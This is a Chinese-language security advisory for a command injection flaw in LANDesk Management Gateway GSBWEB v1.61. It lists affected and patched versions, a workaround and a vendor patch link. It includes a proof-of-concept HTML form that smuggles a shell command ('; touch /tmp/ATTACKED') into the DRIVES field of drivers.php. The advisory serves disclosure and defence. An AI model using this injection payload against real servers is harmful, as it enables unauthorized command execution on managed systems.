LANDesk管理套件HTML表单请求命令注入漏洞

受影响系统:

LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.61
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.61s

不受影响系统:

LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.62
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.62

描述:

Landesk管理套件是一款网络管理系统,可控制桌面,服务器和移动设备等。

Landesk没有正确地验证提交特制请求的用户来源。如果管理员使用攻击者的浏览器登录到了设备,攻击者就可以以gsbadmin用户权限执行任意代码。

<*来源:Aureliano Calvo
  
  链接:http://marc.info/?l=full-disclosure&m=128943189002312&w=2
*>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/—–
<head><title>LANDesk PoC</title></head>
  <body>
    <form method="post" action="https://[server]/gsb/drivers.php">
      <input type="text" name="DRIVES" value="; touch /tmp/ATTACKED">
      <input type="text" name="SECONDTIME" value="1">
      <input type="text" name="ACTION" value="getupdate">
      <input type="submit" value="Attack!">
    </form>
  </body>
</html>
—–/

建议:
临时解决方法:

1. 启动SSH控制台会话,或登录到LDMG控制台并启动终端会话。
2. 发布以下命令:mv/usr/LANDesk/broker/webroot/gsb/drivers.php ~

厂商补丁:

LANDesk Software
—————-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://community.landesk.com/support/docs/DOC-21767

发表评论?

0 条评论。

发表评论